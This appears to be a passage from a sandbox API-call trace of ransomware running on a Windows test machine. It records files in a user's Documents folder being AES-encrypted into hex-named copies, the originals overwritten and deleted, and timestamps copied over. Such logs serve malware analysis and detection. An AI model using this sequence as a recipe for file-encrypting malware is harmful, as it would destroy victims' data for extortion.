lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.802] WriteFile (in: hFile=0x36c, lpBuffer=0x230f6c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x230f6c0*, lpNumberOfBytesWritten=0x1bf5daa8*=0x200, lpOverlapped=0x0) returned 1 [0075.802] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0075.803] WriteFile (in: hFile=0x36c, lpBuffer=0x230f6c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x230f6c0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.804] WriteFile (in: hFile=0x36c, lpBuffer=0x230f6c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x230f6c0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.804] WriteFile (in: hFile=0x36c, lpBuffer=0x230f6c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x230f6c0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.805] WriteFile (in: hFile=0x36c, lpBuffer=0x230f6c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x230f6c0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.805] WriteFile (in: hFile=0x36c, lpBuffer=0x230f6c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x230f6c0*, lpNumberOfBytesWritten=0x1bf5daa8*=0x200, lpOverlapped=0x0) returned 1 [0075.805] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0075.805] SetEndOfFile (hFile=0x36c) returned 1 [0075.806] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0075.806] CloseHandle (hObject=0x36c) returned 1 [0075.806] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uokq05CLt9KkwZ-Bx.xls", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uokq05CLt9KkwZ-Bx.xls", lpFilePart=0x0) returned 0x3d [0075.807] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0075.807] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uokq05CLt9KkwZ-Bx.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uokq05clt9kkwz-bx.xls"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.807] GetFileType (hFile=0x36c) returned 0x1 [0075.807] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0075.807] GetFileType (hFile=0x36c) returned 0x1 [0075.807] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5db78, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0075.807] CloseHandle (hObject=0x36c) returned 1 [0075.807] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uokq05CLt9KkwZ-Bx.xls", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uokq05CLt9KkwZ-Bx.xls", lpFilePart=0x0) returned 0x3d [0075.807] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0075.807] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uokq05CLt9KkwZ-Bx.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uokq05clt9kkwz-bx.xls"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.807] GetFileType (hFile=0x36c) returned 0x1 [0075.807] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0075.807] GetFileType (hFile=0x36c) returned 0x1 [0075.807] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5db78, lpLastWriteTime=0x0) returned 1 [0075.807] CloseHandle (hObject=0x36c) returned 1 [0075.807] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uokq05CLt9KkwZ-Bx.xls", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uokq05CLt9KkwZ-Bx.xls", lpFilePart=0x0) returned 0x3d [0075.807] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0075.808] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uokq05CLt9KkwZ-Bx.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uokq05clt9kkwz-bx.xls"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.808] GetFileType (hFile=0x36c) returned 0x1 [0075.808] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0075.808] GetFileType (hFile=0x36c) returned 0x1 [0075.808] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5db78) returned 1 [0075.808] CloseHandle (hObject=0x36c) returned 1 [0075.808] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uokq05CLt9KkwZ-Bx.xls", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uokq05CLt9KkwZ-Bx.xls", lpFilePart=0x0) returned 0x3d [0075.808] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uokq05CLt9KkwZ-Bx.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uokq05clt9kkwz-bx.xls")) returned 1 [0075.809] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uokq05CLt9KkwZ-Bx.xls", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uokq05CLt9KkwZ-Bx.xls", lpFilePart=0x0) returned 0x3d [0075.809] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3118A00301631C6C3725ADA13E7B1E6C", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3118A00301631C6C3725ADA13E7B1E6C", lpFilePart=0x0) returned 0x48 [0075.809] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0075.809] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3118A00301631C6C3725ADA13E7B1E6C" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3118a00301631c6c3725ada13e7b1e6c"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.809] GetFileType (hFile=0x36c) returned 0x1 [0075.809] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0075.810] GetFileType (hFile=0x36c) returned 0x1 [0075.810] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5dc18, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0075.810] CloseHandle (hObject=0x36c) returned 1 [0075.810] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3118A00301631C6C3725ADA13E7B1E6C", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3118A00301631C6C3725ADA13E7B1E6C", lpFilePart=0x0) returned 0x48 [0075.810] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0075.810] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3118A00301631C6C3725ADA13E7B1E6C" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3118a00301631c6c3725ada13e7b1e6c"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.810] GetFileType (hFile=0x36c) returned 0x1 [0075.810] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0075.810] GetFileType (hFile=0x36c) returned 0x1 [0075.810] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5dc18, lpLastWriteTime=0x0) returned 1 [0075.810] CloseHandle (hObject=0x36c) returned 1 [0075.810] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3118A00301631C6C3725ADA13E7B1E6C", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3118A00301631C6C3725ADA13E7B1E6C", lpFilePart=0x0) returned 0x48 [0075.810] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0075.810] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3118A00301631C6C3725ADA13E7B1E6C" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3118a00301631c6c3725ada13e7b1e6c"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.810] GetFileType (hFile=0x36c) returned 0x1 [0075.810] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0075.810] GetFileType (hFile=0x36c) returned 0x1 [0075.811] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5dc18) returned 1 [0075.811] CloseHandle (hObject=0x36c) returned 1 [0075.811] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VcLUa_IRpSFwCdtTeIUe.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VcLUa_IRpSFwCdtTeIUe.pptx", lpFilePart=0x0) returned 0x41 [0075.811] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VcLUa_IRpSFwCdtTeIUe.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VcLUa_IRpSFwCdtTeIUe.pptx", lpFilePart=0x0) returned 0x41 [0075.812] CryptAcquireContextW (in: phProv=0x1bf5da68, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1bf5da68*=0x1a5b7710) returned 1 [0075.813] CryptImportKey (in: hProv=0x1a5b7710, pbData=0x2312b30, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5da20 | out: phKey=0x1bf5da20*=0x4ce9f0) returned 1 [0075.813] CryptContextAddRef (hProv=0x1a5b7710, pdwReserved=0x0, dwFlags=0x0) returned 1 [0075.813] CryptExportKey (in: hKey=0x4ce9f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x0, pdwDataLen=0x1bf5db30 | out: pbData=0x0*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0075.813] CryptExportKey (in: hKey=0x4ce9f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x2312c20, pdwDataLen=0x1bf5db30 | out: pbData=0x2312c20*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0075.813] CryptImportKey (in: hProv=0x1a5b7710, pbData=0x2312d40, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d9f0 | out: phKey=0x1bf5d9f0*=0x1a626b40) returned 1 [0075.813] CryptContextAddRef (hProv=0x1a5b7710, pdwReserved=0x0, dwFlags=0x0) returned 1 [0075.813] CryptContextAddRef (hProv=0x1a5b7710, pdwReserved=0x0, dwFlags=0x0) returned 1 [0075.813] CryptDuplicateKey (in: hKey=0x1a626b40, pdwReserved=0x0, dwFlags=0x0, phKey=0x1bf5d9e0 | out: phKey=0x1bf5d9e0*=0x1a626fa0) returned 1 [0075.813] CryptContextAddRef (hProv=0x1a5b7710, pdwReserved=0x0, dwFlags=0x0) returned 1 [0075.813] CryptSetKeyParam (hKey=0x1a626fa0, dwParam=0x4, pbData=0x2312e88*=0x1, dwFlags=0x0) returned 1 [0075.813] CryptSetKeyParam (hKey=0x1a626fa0, dwParam=0x1, pbData=0x2312e38, dwFlags=0x0) returned 1 [0075.813] CryptDestroyKey (hKey=0x1a626b40) returned 1 [0075.813] CryptReleaseContext (hProv=0x1a5b7710, dwFlags=0x0) returned 1 [0075.813] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VcLUa_IRpSFwCdtTeIUe.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VcLUa_IRpSFwCdtTeIUe.pptx", lpFilePart=0x0) returned 0x41 [0075.813] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0075.813] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VcLUa_IRpSFwCdtTeIUe.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vclua_irpsfwcdtteiue.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.813] GetFileType (hFile=0x36c) returned 0x1 [0075.813] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0075.813] GetFileType (hFile=0x36c) returned 0x1 [0075.814] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B9E3D1F8F29B04480F47CC8AE7A9A30C", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B9E3D1F8F29B04480F47CC8AE7A9A30C", lpFilePart=0x0) returned 0x48 [0075.814] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0075.814] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B9E3D1F8F29B04480F47CC8AE7A9A30C" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\b9e3d1f8f29b04480f47cc8ae7a9a30c"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x358 [0075.814] GetFileType (hFile=0x358) returned 0x1 [0075.814] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0075.814] GetFileType (hFile=0x358) returned 0x1 [0075.814] ReadFile (in: hFile=0x36c, lpBuffer=0x2313268, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x2313268*, lpNumberOfBytesRead=0x1bf5da28*=0x623a, lpOverlapped=0x0) returned 1 [0075.815] CryptEncrypt (in: hKey=0x1a626fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2327280*, pdwDataLen=0x1bf5da80*=0x6230, dwBufLen=0x6230 | out: pbData=0x2327280*, pdwDataLen=0x1bf5da80*=0x6230) returned 1 [0075.815] WriteFile (in: hFile=0x358, lpBuffer=0x2327280*, nNumberOfBytesToWrite=0x6230, lpNumberOfBytesWritten=0x1bf5da18, lpOverlapped=0x0 | out: lpBuffer=0x2327280*, lpNumberOfBytesWritten=0x1bf5da18*=0x6230, lpOverlapped=0x0) returned 1 [0075.816] ReadFile (in: hFile=0x36c, lpBuffer=0x2313268, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x2313268*, lpNumberOfBytesRead=0x1bf5da28*=0x0, lpOverlapped=0x0) returned 1 [0075.817] CryptEncrypt (in: hKey=0x1a626fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x232d4f0*, pdwDataLen=0x1bf5d9c0*=0x10, dwBufLen=0x10 | out: pbData=0x232d4f0*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0075.817] CryptEncrypt (in: hKey=0x1a626fa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x232d540*, pdwDataLen=0x1bf5d9c0*=0x0, dwBufLen=0x10 | out: pbData=0x232d540*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0075.817] WriteFile (in: hFile=0x358, lpBuffer=0x232d590*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x1bf5d948, lpOverlapped=0x0 | out: lpBuffer=0x232d590*, lpNumberOfBytesWritten=0x1bf5d948*=0x10, lpOverlapped=0x0) returned 1 [0075.817] CloseHandle (hObject=0x358) returned 1 [0075.818] CloseHandle (hObject=0x36c) returned 1 [0075.818] CryptDestroyKey (hKey=0x4ce9f0) returned 1 [0075.818] CryptReleaseContext (hProv=0x1a5b7710, dwFlags=0x0) returned 1 [0075.818] CryptReleaseContext (hProv=0x1a5b7710, dwFlags=0x0) returned 1 [0075.818] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B9E3D1F8F29B04480F47CC8AE7A9A30C", nBufferLength=0x105, lpBuffer=0x1bf5d480, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B9E3D1F8F29B04480F47CC8AE7A9A30C", lpFilePart=0x0) returned 0x48 [0075.818] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d960) returned 1 [0075.818] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B9E3D1F8F29B04480F47CC8AE7A9A30C" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\b9e3d1f8f29b04480f47cc8ae7a9a30c"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.818] GetFileType (hFile=0x36c) returned 0x1 [0075.818] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8d0) returned 1 [0075.818] GetFileType (hFile=0x36c) returned 0x1 [0075.818] ReadFile (in: hFile=0x36c, lpBuffer=0x232ec88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x232ec88*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.819] ReadFile (in: hFile=0x36c, lpBuffer=0x232ec88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x232ec88*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.820] ReadFile (in: hFile=0x36c, lpBuffer=0x232ec88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x232ec88*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.822] ReadFile (in: hFile=0x36c, lpBuffer=0x232ec88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x232ec88*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.823] ReadFile (in: hFile=0x36c, lpBuffer=0x232ec88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x232ec88*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.823] ReadFile (in: hFile=0x36c, lpBuffer=0x232ec88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x232ec88*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.823] ReadFile (in: hFile=0x36c, lpBuffer=0x232ec88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x232ec88*, lpNumberOfBytesRead=0x1bf5da48*=0x240, lpOverlapped=0x0) returned 1 [0075.823] ReadFile (in: hFile=0x36c, lpBuffer=0x232ec88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x232ec88*, lpNumberOfBytesRead=0x1bf5da48*=0x0, lpOverlapped=0x0) returned 1 [0075.823] CloseHandle (hObject=0x36c) returned 1 [0075.824] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B9E3D1F8F29B04480F47CC8AE7A9A30C.info", nBufferLength=0x105, lpBuffer=0x1bf5d200, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B9E3D1F8F29B04480F47CC8AE7A9A30C.info", lpFilePart=0x0) returned 0x4d [0075.824] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d6e0) returned 1 [0075.825] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B9E3D1F8F29B04480F47CC8AE7A9A30C.info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\b9e3d1f8f29b04480f47cc8ae7a9a30c.info"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.825] GetFileType (hFile=0x36c) returned 0x1 [0075.825] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d650) returned 1 [0075.825] GetFileType (hFile=0x36c) returned 0x1 [0075.855] WriteFile (in: hFile=0x36c, lpBuffer=0x213fd00*, nNumberOfBytesToWrite=0x77d, lpNumberOfBytesWritten=0x1bf5d7b8, lpOverlapped=0x0 | out: lpBuffer=0x213fd00*, lpNumberOfBytesWritten=0x1bf5d7b8*=0x77d, lpOverlapped=0x0) returned 1 [0075.876] CloseHandle (hObject=0x36c) returned 1 [0075.887] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VcLUa_IRpSFwCdtTeIUe.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VcLUa_IRpSFwCdtTeIUe.pptx", lpFilePart=0x0) returned 0x41 [0075.889] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5da70) returned 1 [0075.894] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VcLUa_IRpSFwCdtTeIUe.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vclua_irpsfwcdtteiue.pptx"), fInfoLevelId=0x0, lpFileInformation=0x1bf5db50 | out: lpFileInformation=0x1bf5db50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc9fcdf0, ftCreationTime.dwHighDateTime=0x1d4f57b, ftLastAccessTime.dwLowDateTime=0xad3bf630, ftLastAccessTime.dwHighDateTime=0x1d50686, ftLastWriteTime.dwLowDateTime=0xad3bf630, ftLastWriteTime.dwHighDateTime=0x1d50686, nFileSizeHigh=0x0, nFileSizeLow=0x623a)) returned 1 [0075.894] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da30) returned 1 [0075.894] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VcLUa_IRpSFwCdtTeIUe.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VcLUa_IRpSFwCdtTeIUe.pptx", lpFilePart=0x0) returned 0x41 [0075.894] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VcLUa_IRpSFwCdtTeIUe.pptx", dwFileAttributes=0x80) returned 1 [0075.894] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VcLUa_IRpSFwCdtTeIUe.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VcLUa_IRpSFwCdtTeIUe.pptx", lpFilePart=0x0) returned 0x41 [0075.894] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5dab0) returned 1 [0075.894] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VcLUa_IRpSFwCdtTeIUe.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vclua_irpsfwcdtteiue.pptx"), fInfoLevelId=0x0, lpFileInformation=0x2147918 | out: lpFileInformation=0x2147918*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xdc9fcdf0, ftCreationTime.dwHighDateTime=0x1d4f57b, ftLastAccessTime.dwLowDateTime=0xad3bf630, ftLastAccessTime.dwHighDateTime=0x1d50686, ftLastWriteTime.dwLowDateTime=0xad3bf630, ftLastWriteTime.dwHighDateTime=0x1d50686, nFileSizeHigh=0x0, nFileSizeLow=0x623a)) returned 1 [0075.894] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da70) returned 1 [0075.894] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VcLUa_IRpSFwCdtTeIUe.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VcLUa_IRpSFwCdtTeIUe.pptx", lpFilePart=0x0) returned 0x41 [0075.894] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9a0) returned 1 [0075.894] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VcLUa_IRpSFwCdtTeIUe.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vclua_irpsfwcdtteiue.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.894] GetFileType (hFile=0x36c) returned 0x1 [0075.894] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d910) returned 1 [0075.894] GetFileType (hFile=0x36c) returned 0x1 [0075.895] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0075.895] WriteFile 